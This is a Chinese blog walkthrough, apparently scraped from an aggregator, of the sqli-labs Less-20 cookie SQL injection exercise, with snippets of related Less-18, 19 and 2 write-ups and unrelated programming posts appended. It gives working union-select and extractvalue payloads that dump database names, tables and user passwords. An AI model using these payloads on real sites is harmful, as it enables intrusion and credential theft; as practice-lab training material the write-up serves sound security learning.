Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

1.单引号,报错型,cookie型注入。

  (1)登录后页面显示:

     

  (2)查看一下php文件

    

    可以看到查询语句查询cookee,那我们就在cookies里面进行注入

  (3)抓包看一下:

    

    看到cookie:uname=admin ,就可以以cookie注入了

  (4)加单引号发现:

    

    爆出语法错误,看得出来就是单引号型;

  (5)接下来查一下行数

    Cookie:uname=admin‘ order by 3 --+ //正常

    

  Cookie:uname=admin‘ order by 4 --+  //不正常

2.爆破

  (1)爆库:Cookie:uname=-admin‘ union select 1,2,database() --+

    

  (2)爆表:Cookie:uname=-admin‘ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="security"  --+

    

  (3)爆列名:Cookie:uname=-admin‘ union select 1,2,group_concat(column_name)from information_schema.columns where table_name="users"   --+

    

  (4)爆值:Cookie:uname=-admin‘ union select 1,2,group_concat(username,0x7e,password)from security.users    --+

     

     

原文地址:https://www.cnblogs.com/meng-yu37/p/12304945.html

时间: 2024-11-08 23:41:28

Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)的相关文章

【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

这次username和password都进行了输入校验 但是ip和uagent没有校验 当我们用admin admin登陆成功后,就会一条插入语句 由于程序无条件的信任了浏览器的header信息,那么通过修改http包的header信息构造注入 使用burpsuite进行包拦截/修改 修改user-agent字段,加个单引号 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'

Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

1.单引号,报错型,referer型注入点: 本题和上一题很像,回显是referer,查一下php文加可以发现,insert语句中向数据库插入了referer,所以注入点改为referer 2.爆破 (1)Referer: ' and extractvalue(1,concat(0x7e,(select version()),0x7e)) and ' 发现没问题 (2)爆库:' and extractvalue(1,concat(0x7e,(select database()),0x7e)) a

【sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)

与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23 http://localhost/sqli/Less-2/?id=-1 unio

Android中Http加载如何得到Cookie和 WebView 加载网页如何得到的Cookie

最近做项目在手机端登录Http请求和 WebView 记载登录获取Cookie信息,可查看Cookie信息. 如图: Http请求获取Cookie信息: public static String request(String httpUrl, String params, Context context) { BufferedReader reader = null; String result = null; String httpurl = " http://xwwscs.com"

VS 报cmath(19): error C2061: 语法错误: 标识符“acosf” 错误

这是因为我在.c文件中用了 #include <iostream> using namespace std; 这样编译的时候就报: 出现错误类型如下:1>c:\program files (x86)\microsoft visual studio 10.0\vc\include\cmath(19): error C2061: 语法错误: 标识符"acosf"1>c:\program files (x86)\microsoft visual studio 10.0

MySQL主从复制中断,报“Error on master: message (format)=&#39;Cannot delete or update a parent row: a foreign key constraint fails&#39; error code=1217” 错误

前几天,发现从库挂了,具体报错信息如下: 分析思路 1. 因为我采用的是选择性复制,只针对以下几个库进行复制: card,upay,deal,monitor,collect.所以,不太可能出现对于sas_basic的操作能复制到该从库上. 2. 整个架构是1主2从,且都是选择性复制,上面这个从库是直接复制card,upay,deal,monitor,collect这几个数据库的数据,而另外一个从库则是忽略上述库,如下所示: 怀疑是在上述schema下,执行了DROP TABLE IF EXIST

error C2039: &#39;SetDefaultDllDirectories&#39;错误解决办法

使用VS2013+WDK8.1+Win7开发UMDF驱动,当使用了CComPtr类,包含了atlcomcli.h头文件却报错,错误如下: Error 3 error C2039: 'SetDefaultDllDirectories' : is not a member of '`global namespace'' 可是使用VS2012+WDK8.0+Win7却没有这个问题. 经过一番折腾终于找到了解决办法,在预定义中增加一项定义  _USING_V110_SDK71_ 具体见下图: error

Android Studio上Session &#39;app&#39;: Error Installing APK错误解决方案

我在使用Android Studio的时候,使用自己的魅族(M5 Note)真机调试,运行不成功,提示下面图片中的错误(Session 'app':Error Installing APK). 再经过测试过好几种网上的方法之后,特记录如下,望以后大家少走弯路,希望可以帮助到大家. 可能不同的人使用到的方法都会是下面的不同的方法: 1)连接手机之后,会有显示手机的SDK型号以及API的版本,显示我自己的是魅族M5 Note(Android 6,API23),在我的手机上安装不上,刚开始有人说魅族手

[ISSUE][PENDING]cocos2d-x ... error C2059: 语法错误:“-”

在定义的头文件中并没有使用到任何coco2d-x的东西,提示错误 error C2059: 语法错误:“-” (..\..\src\Xxxx.cpp)error C2143: 语法错误 : 缺少“;”(在“}”的前面) (..\..\src\Xxxx.cpp)error C2238: 意外的标记位于“;”之前 (..\..\src\Xxxx.cpp)error C2575: “updateQuadWithParticle”: 只有成员函数和基可以是虚拟的 (..\..\src\Xxxx.cpp)